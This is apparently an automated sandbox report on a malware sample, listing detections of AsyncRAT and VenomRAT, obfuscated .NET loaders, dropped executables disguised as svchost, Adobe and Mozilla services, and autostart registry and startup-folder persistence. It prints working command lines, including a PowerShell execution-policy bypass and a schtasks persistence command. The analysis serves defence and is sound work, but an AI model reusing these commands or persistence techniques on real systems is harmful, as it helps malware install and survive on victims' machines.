Source: xj40xovMsm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 3CBD.tmp.Installer.exe.2.dr, yfwLUpaytDvy.cs	.Net Code: ivaYcmPJXHtcv System.Reflection.Assembly.Load(byte[])
Source: accc.exe.5.dr, yfwLUpaytDvy.cs	.Net Code: ivaYcmPJXHtcv System.Reflection.Assembly.Load(byte[])

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'

Yara detected Costura Assembly Loader

Source: Yara match	File source: 24.2.svchost.exe.6a20000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3207543510.0000000006A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR

Source: 3CBD.tmp.Installer.exe.2.dr

Static PE information: 0xB3ABDDB8 [Thu Jul 9 17:11:20 2065 UTC]

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Code function: 0_2_00007FF68A18384C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileW,CloseHandle,VirtualFree,

0_2_00007FF68A18384C

Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_05110538 push eax; ret	6_2_05110545
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Code function: 6_2_0511EC58 push esp; iretd	6_2_0511EC59
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Code function: 9_2_057AEC58 push esp; iretd	9_2_057AEC59
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011380F9 push es; retf	10_2_01138106
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0113B2A8 pushad ; iretd	10_2_0113B2A9
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01139713 push edi; retf	10_2_01139752
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01139608 push ebx; retf	10_2_01139612
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01139623 push ebx; retf	10_2_01139642
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01139643 push ebp; retf	10_2_011396B2
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01139643 push ebp; retf	10_2_011396C2
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01139643 push edi; retf	10_2_01139752
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011396B3 push ebp; retf	10_2_011396C2
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011396B3 push edi; retf	10_2_01139752
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011396A8 push ebp; retf	10_2_011396B2
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011396D3 push edi; retf	10_2_01139752
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_011396C3 push edi; retf	10_2_01139752
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_01139F2F push ebp; retf	10_2_01139F3E
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_0555E900 push E406ACAAh; iretd	10_2_0555E905
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Code function: 10_2_05551F28 push edi; retf	10_2_05551F36
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Code function: 19_2_00007FFD9B5F00BD pushad ; iretd	19_2_00007FFD9B5F00C1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06B36EF4 push E806A797h; retf	24_2_06B36EF9
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06B33CC0 push es; ret	24_2_06B33CD0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06B37C03 push eax; ret	24_2_06B37C04
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06B37BCB push eax; ret	24_2_06B37BCC
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06B350DF push es; ret	24_2_06B350E0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D180F2 push es; ret	24_2_06D180FC
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D52690 push es; ret	24_2_06D526A0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D53E8D push es; iretd	24_2_06D53EAC
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D53EB1 push es; retf D539h	24_2_06D53EF4
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D5EB8A push eax; ret	24_2_06D5EB91
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 24_2_06D5A83E push es; ret	24_2_06D5A868

Source: 3CBD.tmp.Installer.exe.2.dr	Static PE information: section name: .text entropy: 7.52310872889488
Source: accc.exe.5.dr	Static PE information: section name: .text entropy: 7.52310872889488

Source: 53A5.tmp.update.exe.2.dr, zyThENgDGfg.cs	High entropy of concatenated method names: 'ENAEgdtUvXRDlvvo', 'ekngeYZXgecDFZ', 'EFuhkyNeLZeeI', 'RXSkXtWyfRyes', 'dLkgnLSXQRJ', 'lefKjZrZkeU', 'tXJUZGRmXTibZ', 'YafXnCLQVVTG', 'eibHGLdPvEWJEjJ', 'ANMLfUhVqLU'
Source: 5087.tmp.update.exe.2.dr, zyThENgDGfg.cs	High entropy of concatenated method names: 'ENAEgdtUvXRDlvvo', 'ekngeYZXgecDFZ', 'EFuhkyNeLZeeI', 'RXSkXtWyfRyes', 'dLkgnLSXQRJ', 'lefKjZrZkeU', 'tXJUZGRmXTibZ', 'YafXnCLQVVTG', 'eibHGLdPvEWJEjJ', 'ANMLfUhVqLU'

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe

File created: C:\Users\user\AppData\Roaming\svchost.exe

Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\xj40xovMsm.exe	File written: C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exe			Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exe			Jump to behavior

Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\com.adobe.dunamis\Service_com.adobe.dunamis.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\{B955B2CC07A01546086603}.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Local\Temp\SystemUpdate.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\psvhost.exe	Jump to dropped file
Source: C:\Windows\System32\relog.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\zbi[1].exe	Jump to dropped file
Source: C:\Windows\System32\relog.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	File created: C:\ProgramData\KMSAuto\accc.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zbi[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	File created: C:\Users\user\AppData\Roaming\svchost.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Skype\Service_Skype.exe	Jump to dropped file
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Service_Microsoft.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe

File created: C:\ProgramData\KMSAuto\accc.exe

Jump to dropped file

Source: C:\Windows\System32\relog.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack			Jump to dropped file
Source: C:\Windows\System32\relog.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\3CBD.tmp.Installer.exe.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	File created: C:\ProgramData\134349\InstalledSoftware.txt
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe	File created: C:\Users\user\AppData\Roaming\134349\InstalledSoftware.txt

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 14.0.5087.tmp.update.exe.6f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.4336.tmp.Server.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5087.tmp.update.exe.2aa51fc.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 19.0.5E16.tmp.aaa.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPED

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_com.adobe.dunamis	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WpnUserService
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACCC Tools	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Mozilla	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Skype	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_{B955B2CC07A01546086603}
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Adobe	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe

Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\Desktop\xj40xovMsm.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Adobe.exe.lnk

Jump to behavior

Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Adobe.exe.lnk	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_com.adobe.dunamis.exe.lnk	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Microsoft.exe.lnk	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Mozilla.exe.lnk	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Skype.exe.lnk	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\psvhost.exe.lnk	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_{B955B2CC07A01546086603}.exe.lnk

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Adobe	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Adobe	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_com.adobe.dunamis	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_com.adobe.dunamis	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Mozilla	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Mozilla	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Skype	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_Skype	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive	Jump to behavior
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACCC Tools	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACCC Tools	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_{B955B2CC07A01546086603}
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Service_{B955B2CC07A01546086603}
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WpnUserService
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WpnUserService

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5B

Source: C:\Windows\explorer.exe

Code function: 2_2_0F3C2854 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0F3C2854

Source: C:\Users\user\AppData\Roaming\svchost.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\DFDC08F28FCAA4CBE8BA 7FD48AC68F182E0CED2ACE00B223FA1D35BD8A20D75600B5400267CD5DB5CC84

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
